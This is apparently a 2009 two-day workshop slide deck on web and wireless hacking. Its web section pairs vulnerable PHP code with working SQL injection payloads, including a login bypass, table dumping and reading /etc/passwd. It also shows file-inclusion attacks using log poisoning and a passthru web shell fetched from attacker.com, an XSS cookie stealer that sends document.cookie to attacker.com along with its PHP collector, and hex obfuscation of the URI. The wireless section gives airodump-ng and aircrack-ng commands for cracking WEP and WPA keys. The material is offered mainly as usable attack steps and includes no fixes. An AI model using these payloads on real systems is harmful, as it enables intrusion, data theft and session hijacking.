web & wireless hacking
DESCRIPTION
Complete Guide on Web & Wireless HackingTRANSCRIPT
IPSECS
www.ipsecs.com
WEB & WIRELESS HACKING
Don “df0x” Anto
Makasar, Juni 2009
IPSECS
www.ipsecs.com
Content• Introduction• Web Exploitation
– SQL Injection– File Inclussion– XSS
• Breaking Wireless Infrastructure– War Driving– Exploiting Wireless Network
IPSECS
www.ipsecs.com
Introduction• Don “df0x” Anto• IT security researcher• Hacker?? Not, but IT security researcher• Contact
• URL– http://ipsecs.com– http://kandangjamur.net
• Bachelor degree in Electrical engineering• Add my facebook [email protected]
IPSECS
www.ipsecs.com
1st Day, WEB HACKING
IPSECS
www.ipsecs.com
Web Exploitation• It's exploiting web application programming
flaws.• Programming mistakes are always happen.• Targeting clients or servers.• Possible to steal databases and other sensitif
informations, steal cookie or session, execute arbitrary commands, or fully compromise the system.
• It's easy to do. Google helps you :).
IPSECS
www.ipsecs.com
Common Web Exploitation• SQL Injection, an attack which's targeting
sensitive information in database server. Possible to compromise system.
• File Inclussion, an attack which usually to gain shell access on the remote target.– Local file inclussion– Remote file inclussion
• Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website.– Doom– Persistent– Non-persistent
IPSECS
www.ipsecs.com
SQL INJECTION
IPSECS
www.ipsecs.com
SQL Injection• Injecting malicious SQL query to take profits.• Usually is used to bypass login, steal sensitive
information on database. Further attack can be used in fully compromising system.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
IPSECS
www.ipsecs.com
SQL Injection in login form• User input in login form is not validated before to
be executed in database.• Attacker is possible to send arbitrary SQL query
through login form and bypassing login process.• Attacker can also execute other SQL query.
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code in login process:
$pass = md5($_POST['password']);
$query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'";
$q = mysql_query($query);
• Username which's sent from login form is not validated.
IPSECS
www.ipsecs.com
Exploit Login• Exploit code:username = admin' OR 'a'='a
password = terserah
• SQL query to be executed by database server is:SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a'
AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
IPSECS
www.ipsecs.com
SQL Injection in login form
IPSECS
www.ipsecs.com
SQL Logic• AND operator is executed before OR, result of
query is:'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47'
• Boolean logic result is FALSE, then:username = 'admin' OR FALSE
• Boolean logic result is TRUE (admin).• Attacker successfully bypassing login form.
IPSECS
www.ipsecs.com
SQL Injection in URI parameter• Parameter input in URI is not validated before to
be executed in database.• Attacker is possible to send arbitrary SQL query
by modifying parameter input.
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code while inputing URI
parameters:
$query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ;
$q = mysql_query($query);
• Parameter 'aid' which's taken from URI is not validated.
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Checking vulnerability using AND logichttp://example.com/news.php?aid=1 AND 1=1--
http://example.com/news.php?aid=1 AND 1=0--
• Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1--
http://example.com/news.php?aid=1 UNION SELECT 1,2--
http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n--
IPSECS
www.ipsecs.com
Knowing Number of Field
IPSECS
www.ipsecs.com
SQL Injection in URI parameter• In Case table which generates “news”
contains 3 fields
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Knowing tables in databasehttp://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--
• Knowing fields in table 'tblUser'http://example.com/news.php?aid=-1 UNION SELECT
1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572--
IPSECS
www.ipsecs.com
Knowing Tables in DB
IPSECS
www.ipsecs.com
Exploiting SQL Injection• Viewing information in tableshttp://example.com/news.php?aid=-1 UNION SELECT
1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser--
• Viewing arbitrary files (if FILE access is granted)http://example.com/news.php?aid=-1 UNION SELECT
1,2,LOAD_FILE('/etc/passwd')--
OR IN HEXAL
http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)--
IPSECS
www.ipsecs.com
Viewing Table Records
IPSECS
www.ipsecs.com
FILE INCLUSSION
IPSECS
www.ipsecs.com
File Inclussion• Including malicious or sensitive file to be
executed by server.• Usually is used to steal sensitive information,
execute arbitrary command, or compromise system.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
IPSECS
www.ipsecs.com
Local File Inclussion• Including sensitive file in local server (vulnerable
server) to be executed by server.• Usually is used to steal sensitive information,
execute arbitrary command. Further attack can be used in fully compromising system.
• User input is not well validated or no sanitation process.
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
define('DOCROOT', '/var/www/html/modules');
$filename = DOCROOT . "/" . $_GET['module'] . ".php";
include($filename);
• Parameter 'module' which's taken from URI is not validated.
IPSECS
www.ipsecs.com
Viewing Sensitive Files• Exploit code to viewing sensitive files on
vulnerable system:
http://example.com/index.php?module=../../../../../../../etc/passwd%00
http://example.com/index.php?module=../../../../../../../etc/group%00
IPSECS
www.ipsecs.com
File /etc/passwd
IPSECS
www.ipsecs.com
Placing Malicious Log• Placing malicious apache log uses telnet to inject
system command:
$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1
Host:example.com
IPSECS
www.ipsecs.com
Malicious Log
IPSECS
www.ipsecs.com
Executing Command• Executing command via access_log apache (in
case apache log is readable)
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=uname -a
http://example.com/index.php?module=../../../../../../../usr/local/apache/logs/access_log%00&cmd=id
IPSECS
www.ipsecs.com
Command “id”
IPSECS
www.ipsecs.com
Remote File Inclussion• Including sensitive file in remote server (attacker
server) to be executed by server.• Usually to execute arbitrary command using web
shell. Further attack can be used in fully compormising system.
• User input is not well validated or no sanitation process.
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
$filename = $_GET['page'] . ".php";
include($filename);
• Parameter 'page' which's taken from URI is not validated.
IPSECS
www.ipsecs.com
PHP Shell• Simple web shell:<?php
/*Basic PHP web shell injek.txt*/
if(isset($_GET['exec'])){
if(!empty($_GET['exec'])){
$cmd = $_GET['exec'];
if(function_exists('passthru')){
passthru($cmd);
}
}
}
?>
IPSECS
www.ipsecs.com
Public PHP Shell• Widely known web shell : r57, c99• Commonly used in exploiting remote file
inclussion.
IPSECS
www.ipsecs.com
r57
IPSECS
www.ipsecs.com
Executing Command• Injecting command:
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=id
http://example.com/view.php?page=http://attacker.com/injek.txt&exec=ls -al
IPSECS
www.ipsecs.com
Command 'ls -al'
IPSECS
www.ipsecs.com
CROSS SITE SCRIPTING
IPSECS
www.ipsecs.com
Cross Site Scripting• Inserting HTML/java script code to be executed
by client browser which views vulnerable website.
• Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file.
• User input is not well validated or no sanitation process.
• All examples and demos bellow are in PHP MySQL.
IPSECS
www.ipsecs.com
Cross Site Scripting• Doom based XSS, XSS in vulnerable file which
comes from default installed software.• Non-Persistent XSS, XSS in vulnerable web
page which can be exploited by tricking user to click malicious URI. Characteristic : temporal.
• Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent.
IPSECS
www.ipsecs.com
Vulnerable Code• Example vulnerable code:
echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>\n";
• Parameter 'key' which's sent from search form is not validated.
IPSECS
www.ipsecs.com
Cross Site Scripting• Checking if XSS vulnerable:
http://example.com/search.php?key=<script>alert('XSS found dude!')</script>
IPSECS
www.ipsecs.com
Cross Site Scripting
IPSECS
www.ipsecs.com
Cookie Stealing• Stealing cookie:http://example.com/search.php?key=<script
src="http://attacker.com/payload.js"></script>
• Content payload.jsdocument.location="http://attacker.com/cookie-save.php?
c="+document.cookie
IPSECS
www.ipsecs.com
Cookie Grabber• Content of cookie-save.php:<?php
/*Cookie stealer*/
$f = fopen('/tmp/cookie.txt', 'a');
$date = date("j F, Y, g:i a");
fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."\n".
"Cookie : ". $_GET['c'] ."\n".
"Date and Time : ". $date ."\n".
"\n\n");
fclose($f);
?>
IPSECS
www.ipsecs.com
Hexal Encoding• Anonymize malicious URI using hexal encoding:http://example.com/search.php?key=<script
src="http://attacker.com/payload.js"></script>
HEXAL ENCODING
http://example.com/search.php?key=%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
IPSECS
www.ipsecs.com
DEMO - Q&A WEB HACKING
IPSECS
www.ipsecs.com
THANK YOU!
IPSECS
www.ipsecs.com
2nd Day, WIRELESS HACKING
IPSECS
www.ipsecs.com
Wireless Network• Now, is widely used in campus, government,
company, and many public places.• Provide network for mobile devices.• More flexible than wired network.• More insecure than wired network, so here we
go!
IPSECS
www.ipsecs.com
War Driving• Activity to search Wi-Fi wireless network.• Public tools to do War Driving
– Windows : NetStumbler, Wireshark– Linux : Kismet, AirCrack-ng, AirSnort, Wireshark– OSX : KisMac
• I'm using Linux Ubuntu 8.10.
IPSECS
www.ipsecs.com
Kismet• Console based 802.11 wireless network detector
and sniffer.• It identifies wireless network by pasively sniffing.• It's already exist on Ubuntu Repository or you
can download from www.kismetwireless.net. • Use 'apt-get install kismet' on Ubuntu, read the
README if you want to install from source.
IPSECS
www.ipsecs.com
Kismet
IPSECS
www.ipsecs.com
Kismet
IPSECS
www.ipsecs.com
Kismet
IPSECS
www.ipsecs.com
AirSnort• GUI based 802.11 wireless network detector.• Designed for WEP Cracker.• It isn't ready on my Ubuntu repository, download
from www.sourceforge.net.• Read the README to install.
IPSECS
www.ipsecs.com
aircrack-ng (formerly : aircrack)• Console based 802.11 wireless network
detector. • Designed for WEP & WPA-PSK Cracker.• It's already exist on Ubuntu repository or you can
downlod from www.aircrack-ng.org.• Use 'apt-get install aircrack-ng' on Ubuntu, read
the README if you want to install from source.
IPSECS
www.ipsecs.com
aircrack-ng (formerly : aircrack)airodump wlan0
IPSECS
www.ipsecs.com
Wireshark• GUI based network protocol analyzer for UNIX
and Windows.• The most complete protocol analyzer which
support many data communication protocols.• It's already exist on Ubuntu repository or you can
download from www.wireshark.org.• Use 'apt-get install wireshark' on Ubuntu,read the
README if you want to install from source.
IPSECS
www.ipsecs.com
Wireshark
IPSECS
www.ipsecs.com
NetStumbler• Best known windows tool to find wireless
networks.• It is function like Kismet on linux or KisMac on
OSX.• You can download NetStumbler in
www.netstumbler.com • Since I use ubuntu, there's no demo for this tool.
IPSECS
www.ipsecs.com
NetStumbler
IPSECS
www.ipsecs.com
Wireless Network Protection• MAC Filtering• WEP (Wired Equivalent Privacy)• WPA (Wi-Fi Protected Access)• WPA2 (Wi-Fi Protected Access 2)• Captive Portal
IPSECS
www.ipsecs.com
Exploiting Wireless Network• Miss Configuration (Human Error)• Spoofing• Cracking Protection• Denial of Service
IPSECS
www.ipsecs.com
Miss Configuration• Default Configuration on Device (Access Point)• Default Username & Password• Default Range IP Address• SNMP public & private community• No encryption enabled
IPSECS
www.ipsecs.com
Spoofing & Rogue AP• Spoofing MAC address to bypass MAC filtering.• Tools
– Linux : ifconfig– Windows : smac, regedit
• Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing.
• Tools– airsnarf http://airsnarf.shmoo.com
IPSECS
www.ipsecs.com
MAC Spoofing
IPSECS
www.ipsecs.com
WEP Cracking• WEP is based on RC4 algorithm and CRC32.• Collecting as much as possible weak IV
(Insialization Vector) to be used in FMS attack.• Accelerated collecting IV using traffic injection.• Tools : aircrack-ng, AirSnort
IPSECS
www.ipsecs.com
WEP Cracking• Start interface on Monitor mode.• Run kismet to find AP target.• Find AP with connected clients on it. Or do fake
authentication to associate with AP if no client connected.
• Inject packet using aireplay-ng• Dump packet using airodump-ng• Crack dumped file using aircrack-ng
IPSECS
www.ipsecs.com
Dumping Packet
airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0
IPSECS
www.ipsecs.com
Cracking Key
aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap
Key is “abcdef1234”
IPSECS
www.ipsecs.com
WPA Cracking• WPA is based on RC4 algorithm + TKIP/AES• WPA-PSK can be attack using dictionary attack.• Of course, it needs dictionary• Can be cracked when offline• Tools : aircrack-ng
IPSECS
www.ipsecs.com
WPA Cracking• Start interface on Monitor mode.• Run kismet to find AP target.• Find AP with which,s protected by WPA.• Dump packet using airodump-ng• Wait for a client to authenticate to AP, or
deauthenticate client which's connected to AP.• Crack dumped file using aircrack-ng
IPSECS
www.ipsecs.com
WPA Cracking
airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0
IPSECS
www.ipsecs.com
WPA Cracking
aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap
Key is “miko2009”
IPSECS
www.ipsecs.com
Denial of Service• Making wireless network unavailable.• Tools : airjack, void11, aircrack
IPSECS
www.ipsecs.com
DEMO - Q&A WIRELESS HACKING
IPSECS
www.ipsecs.com
THANK YOU!